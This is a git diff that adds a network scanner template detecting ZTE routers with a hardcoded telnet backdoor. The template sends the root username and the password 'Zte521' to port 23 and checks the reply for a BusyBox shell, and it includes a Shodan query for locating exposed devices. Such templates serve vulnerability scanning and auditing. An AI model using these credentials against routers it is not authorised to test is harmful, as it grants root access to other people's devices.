diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
new file mode 100644
index 0000000000..1c3c9c8e05
--- /dev/null
+++ b/network/backdoor/backdoored-zte.yaml
@@ -0,0 +1,34 @@
+id: backdoored-zte
+
+info:
+  name: Backdoored ZTE Routers
+  author: its0x08
+  severity: high
+  description: |
+    Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
+  reference:
+    - https://www.exploit-db.com/ghdb/7179
+  metadata:
+    verified: true
+    shodan-query: http.html:"ZTE Corporation"
+  tags: network,zte,telnet,backdoor,router
+
+network:
+  - host:
+      - "{{Hostname}}"
+      - "{{Host}}:23"
+
+    inputs:
+      - data: "root\r\n"
+      - data: "Zte521\r\n\r\n"
+        read: 1024
+
+    matchers:
+      - type: word
+        words:
+          - "BusyBox"
+
+    extractors:
+      - type: regex
+        regex:
+          - '[A-Z]{1,}[0-9]{3,4}'